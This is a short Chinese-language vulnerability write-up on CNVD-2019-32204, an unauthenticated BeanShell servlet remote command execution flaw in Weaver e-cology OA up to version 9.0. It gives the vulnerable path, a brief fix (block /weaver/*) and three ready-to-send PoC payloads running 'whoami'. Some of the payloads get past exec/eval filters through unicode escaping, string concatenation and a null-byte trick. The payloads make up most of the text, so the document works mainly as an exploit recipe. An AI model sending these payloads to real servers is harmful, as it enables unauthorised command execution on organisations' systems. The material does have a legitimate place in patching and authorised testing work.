參考
https://blog.csdn.net/qq_41770175/article/details/102821349
https://www.linktrust.net/oday/471.html
https://www.freebuf.com/vuls/215218.html
漏洞描述
泛微e-cology OA系統的J**A Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠程命令執行
CNVD編號
CNVD-2019-32204
影響版本
e-cology <=9.0
漏洞修復
屏蔽/weaver/*目錄的訪問
漏洞復現
1.漏洞路徑:/weaver/bsh.servlet.BshServlet
2.
把print(“hello!”)換成exec(“whoami”),就可以測試能否執行系統命令了。
Poc1:bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw
如果有全局過濾器過濾了exec或eval,會有報錯,
可以采用unicode編碼、字符串拼接等方式繞過,見下圖:
Poc2: bsh.script=\u0065\u0078\u0065\u0063(“whoami”);&bsh.servlet.output=raw
-----------------------------
Poc3:
bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(\”command\”))”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami